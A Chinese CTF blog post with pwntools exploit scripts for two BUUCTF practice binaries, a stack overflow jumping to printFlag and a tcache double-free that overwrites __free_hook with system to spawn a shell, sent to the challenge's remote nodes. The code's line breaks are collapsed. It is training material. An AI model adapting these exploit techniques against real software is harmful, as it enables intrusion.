BUUCTF bbys_tu_2016xm_2019_awd_pwn2
在家希望武汉的师傅们一切都好~~
bbys_tu_2016
这道有点没搞清额额flag文件是flag.txt是能control但是好像不能ROP也是能读到flag文件的就很简单了还有似乎文件没写好setbuf函数不会先出现io流
exp:
#!/usr/bin/python2
from pwn import *
local=0
if local==1:p=process('../binary/bbys_tu_2016')elf=ELF('../binary/bbys_tu_2016')
else:p=remote('node3.buuoj.cn',25744)elf=ELF('../binary/bbys_tu_2016')
def exp():main=0x080485C9payload='a'*0x18+p32(elf.sym['printFlag'])p.sendline(payload)p.interactive()if __name__=="__main__":exp()
xm_2019_awd_pwn2
直接tcache double free拿到free_hook甚至都不会检查size是否存在使得漏洞利用变得极为的简单打到free_hook写成system然后布置好chunk free拿到shell
exp:
#!/usr/bin/python2
from pwn import *
local=0
if local==1:p=process('./xm_2019_awd_pwn2')elf=ELF('./xm_2019_awd_pwn2')libc=elf.libc
else:p=remote('node3.buuoj.cn',25112)elf=ELF('./xm_2019_awd_pwn2')libc=elf.libc
def add(size,content):p.sendlineafter('>>','1')p.sendlineafter('size:',str(size))p.sendlineafter('content:',content)def delete(idx):p.sendlineafter('>>','2')p.sendlineafter('idx:',str(idx))def show(idx):p.sendlineafter('>>','3')p.sendlineafter('idx:',str(idx))
lg=lambda address,data:log.success('%s: '%(address)+hex(data))def exp():add(0x500,'doudou') #0add(0x500,'douodu1') #1delete(0)show(0)libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['__malloc_hook']-0x10-96#lg('libcbase',libcbase)system=libcbase+libc.sym['system']free_hook=libcbase+libc.sym['__free_hook']add(0x60,'doudou1')#2add(0x60,'doudou2')#3delete(2)delete(2)add(0x60,p64(free_hook))add(0x60,'doudou3')#4add(0x60,p64(system))#5add(0x20,'/bin/sh\x00')#6lg('libcbase',libcbase)p.sendlineafter('>>','2')p.sendlineafter('idx:','7')p.interactive()
if __name__=="__main__":exp()BUUCTF bbys_tu_2016xm_2019_awd_pwn2相关推荐
- BUUCTF的Web真题学习整理(一)
目录 WEB1-WarmUp (任意文件包含漏洞) WEB2-高明的黑客(fuzz脚本) WEB3-easy_tornado (服务端模板注入(ssti攻击)) WEB4-Hack World(时间盲 ...
- BUUCTF寒假刷题-Web
前言 寒假横向刷题(尽量) BUUCTF
- BUUCTF之[Zer0pts2020]Can you guess it? basename函数绕过
BUUCTF之[Zer0pts2020]Can you guess it? basename函数绕过 题目 后台PHP源码: <?php include 'config.php'; // FLA ...
- BUUCTF刷题笔记
BUUCTF刷题笔记 [极客大挑战 2019]BabySQL 从这句话我们可以看出,这个网站的后台是做了过滤处理的 这个时候我们先用万能密码实验一下看看,是什么类型的SQL注入 输入1',看看返回的结 ...
- BUUCTF Quoted-printable编码
Quoted-printable可译为"可打印字符引用编码",编码常用在电子邮件中,如:Content-Transfer-Encoding: quoted-printable ,它 ...
- BUUCTF NewStarCTF一些新知识记录
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 目录 前言 一.eazyxor 二.RSA_begin 三.Yesec no drumsticks 四.EzSnake 五.Pyre ...
- buuctf Mark loves cat
buuctf Mark loves cat 打开是个静态页面,源码也无任何有用信息 dirsearch扫描后发现.git泄露 GitHack.py下载得到两个php文件,接下来就是代码审计: flag ...
- BUUCTF·[MRCTF2020]天干地支+甲子·WP
题目来源 BUUCTF在线评测 (buuoj.cn) 附件 得到得字符串用MRCTF{}包裹 一天Eki收到了一封来自Sndav的信,但是他有点迷希望您来解决一下 甲戌 甲寅 甲寅 癸卯 己酉 甲寅 ...
- BUUCTF Reverse/findKey
BUUCTF Reverse/findKey 先看文件信息:32位程序,没有加壳 打开看看,标题为find flag,也没啥有用的信息 IDA32位打开,找到start函数,看到有个main,跟随跳转 ...
最新文章
- 谷歌最新视频抠图术:影子烟雾都能抠,添加水印更顺滑,UP主剪辑利器 | 开源...
- conv2d函数_Pytorch 从0开始学(6)——Conv2d 详解
- 求一颗二叉树中两个节点的最低公共父节点
- 02--MySQL自学教程:数据库MySQL纯净卸载
- C/Cpp / 类中静态成员变量和普通成员变量的区别
- dataframe 选择输出_使用 Python 实现机器学习特征选择的 4 种方法
- c语言printf %llo,c++ - Printf疯狂了 - 堆栈内存溢出
- http与https与socket tcp/IP与UDP 协议等
- Struts 2 Spring Hibernate三大框架的执行流程以及原理
- android教程1009无标题,Android ActionBarActivity设置全屏无标题实现方法总结_Android_脚本之家...
- AMBA interconnector PL301(一)
- SpringBoot实现JWT保护前后端分离RESTful API
- hp1015驱动64位_惠普1015打印机驱动下载
- 实验6 地理数据可视化
- 报刊订阅管理系统(数据库课程设计)
- 恋与制作人 服务器错误,恋与制作人登陆不了怎么办 登录失败无法登录DNS劫持全解析...
- 图形学数学基础之1D采样分布计算方法Inverse Method
- lightroom初学
- PMP缓考怎么操作?
- 焦绪录:大数据如何推动数字中国建设